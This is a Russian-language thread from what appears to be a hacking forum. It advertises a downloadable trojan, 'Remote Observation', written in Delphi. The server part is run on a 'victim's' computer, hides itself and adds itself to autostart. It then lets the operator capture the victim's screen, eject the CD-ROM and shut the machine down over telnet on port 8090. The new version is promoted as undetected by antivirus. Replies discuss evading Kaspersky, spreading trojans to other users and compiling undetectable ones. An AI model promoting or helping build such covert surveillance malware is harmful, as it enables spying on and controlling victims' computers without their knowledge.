• XSS.stack #1 – первый литературный журнал от юзеров форума

Удаленное наблюдение

Winux

Старожил форума
Легенда
Реакции
53
Программа позволяет получать и просматривать картинку рабочего стола с удаленного компьютера. Программа состоит из 2-х частей: клиент и сервер. Сервер необходимо запустить на компьютере жертвы. При запуске он сразу спрячется. Клиент - его вы запускаете у себя на компьютере и даете команды серверной части на выполнение выбранных действий. Возможности программы:

1.Получать и просматривать картинку рабочего стола с удаленного компьютера - эту функцию рекомендую использовать только по локальной сети, так как размер файла картинки более 3-х Mb.
2. Открывать и закрывать CD-ROM на компьютере жертвы - можно через Интернет.
3. Выключать компьютер жертвы - можно через Интернет.
4. Добавлять (удалять) серверную часть программы в автозагрузку на компьютере жертвы - можно через Интернет.
Программа использует для работы порт 8090. Все выбранные действия можно выполнять через Telnet клиент используя команды :
CD+ открыть CD-ROM
CD- закрыть CD-ROM
OFF выключить компьютер
ADD добавить Server.exe в автозагрузку
DEL удалить Server.exe из автозагрузки

Скачать Удаленное наблюдение

Удаленное наблюдение 1.1
remote_observation.gif

Новая версия этой программы не палится антивирем. Добавлена возможность настраивать частоту получения скрина с компа жертвы.

Вот что умеет прога по словам автора:
Программа позволяет получать и просматривать картинку рабочего стола с удаленного компьютера. Программа состоит из 2-х частей: клиент и сервер. Сервер необходимо запустить на компьютере жертвы. При запуске он сразу спрячется. Клиент - его вы запускаете у себя на компьютере и даете команды серверной части на выполнение выбранных действий.
Возможности программы:
1.Получать и просматривать картинку рабочего стола с удаленного компьютера - эту функцию рекомендую использовать только по локальной сети, так как размер файла картинки более 3-х Mb.
2. Открывать и закрывать CD-ROM на компьютере жертвы - можно через Интернет.
3. Выключать компьютер жертвы - можно через Интернет.
4. Добавлять (удалять) серверную часть программы в автозагрузку на компьютере жертвы - можно через Интернет.

Программа использует для работы порт 8090. Все выбранные действия можно выполнять через Telnet клиент используя команды :
CD+ открыть CD-ROM
CD- закрыть CD-ROM
OFF выключить компьютер
ADD добавить Server.exe в автозагрузку
DEL удалить Server.exe из автозагрузки

Программа написана на Delphi 7.

:zns5: Скачать Удаленное наблюдение 1.1

Отлично...непалица :)))
Осталось тока функций побольше добавить и сократить размер серверной части :)

Люди.. я поражаюсь.. У мну стоит Каспер 121 + новые базы, так он в момент палит это усё... Я ещё ни разу не встречал такую прогу которая обошла бы каспера..

Все говорят НЕ ПАЛИЦЦА!! вы базы обновите у себя сначала.. а потом говорите..
Я юзал как то прогу Троян GST, всем раскидал в сети кому мог... потом пришлось на мороз падать когда на меня наехали.. Так вот я тоже думал что прога верх совершенства и не палицца, а когда обновил каспера сразу же запищал!!

Блиа, ты туп или как? Погляди на дату поста. Ты бы еще через 5 лет нашел и написал что палится и что тебя бедного обманули. Мне непалащиеся проги часто встречаются. Если не веришь, давая я скомпилю непалящийся трой. Если он пальнется ты его сотрешь. Если нет - откроешь. Вот тогда и посмотрим.

Так как ты пальцы растопыривать и я умею.

Spawn™, мда... неужеле у нас выгул оленей на форуме? как сп2 может палить трояна? =))) это мега лол... дятел ты тоскливый, сп 2 - это заплтака дырок в маздае а не антивирус. :lol2: :lol2:

Код:
Я ещё ни разу не встречал такую прогу которая обошла бы каспера..

Winux, мы с тобой супер хЭкеры ;) мы обошли каспера, оббежали его, покрутились вокруг недо, надавале пендалей и т.д. ;) ваще Л0Лик...

Низачот) Писать такое дело 5 минут на компонентах и дело 10 минут на низком уровне. З.ы зря автор ещё встроил поддержку консоли на удалённом компютере.

Погодите а зачем вообще изобретать такой велосипед я конечно не против но помоему старый добрай radmin ничем не палится да и зачем ему палится если это не трой и он позволяет получать не только картинку но и наблюдать в реальном времени за действиями пользователя или я не прав??

У каспера палится все-от assaultd за то что прописывает стартовую страничку и до радмина.Сколько уже было блеков из-за продажи прог которых каспер определяет как hack.tool

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх